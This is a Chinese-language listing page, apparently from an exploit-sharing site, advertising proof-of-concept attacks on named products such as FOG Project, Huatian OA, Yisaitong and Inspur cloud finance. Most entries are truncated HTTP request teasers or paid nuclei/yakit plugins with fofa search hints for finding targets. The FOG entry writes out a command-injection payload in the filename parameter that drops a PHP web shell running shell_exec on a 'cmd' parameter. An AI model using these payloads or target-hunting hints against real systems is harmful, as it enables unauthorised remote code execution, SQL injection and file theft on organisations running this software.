POC_秃兔安全

fogproject系统接口export.php存在远程命令执行漏洞

POST /fog/management/export.php?filename=$(echo+'<?php+echo+shell_exec($_GET[‘”‘cmd'”‘]);+?>’+>+lol.php)&type=pdf HTTP/1.1Host: 192.168.15.5Content-Length: 21Use...

2024你懂的

秃兔6个月前

0515

华天动力-OA-downloadWpsFile任意文件读取

2024你懂的

秃兔6个月前

0805

【通用】万能门店小程序sql注入漏洞

fofa body=yakit插件 uuid经过科研发现有些存在的系统有的可以使用报错注入有些只能使用延时注入，于是两种检测方式都写上了，所有可能会误报。pocyakitnuclei已验证

付费阅读500 # poc # yakit # nuclei

dreamer2926个月前

02303

【通用】某电子资料管理系统RCE漏洞

fofa body=''yakit插件 uuidpocyakitnuclei已验证nuclei

付费阅读500 # poc # yakit # nuclei

dreamer2926个月前

0901

亿赛通电子文档安全管理系统NoticeAjax接口存在SQL注入漏洞

POST /CDGServer3/NoticeAjax;Service HTTP/1.1Host: ip:8443Cookie: JSESSIONID=A7058CC5796E5F433F2CC668C7B7B77D; JSESSIONID=0E09F2450421C51339E5657425612536Cache-Control: max-age=0Sec...

2024你懂的 # poc

秃兔6个月前

0750

浪潮云财务系统存在命令执行

POST /cwbase/gsp/webservice/bizintegrationwebservice/bizintegrationwebservice.asmx HTTP/1.1Host:Content-Type: text/xml; charset=utf-8Content-Length: 16396SOAPAction: “http://tempu...

2024你懂的 # poc

秃兔6个月前

0930

上一页 1…42 4344跳转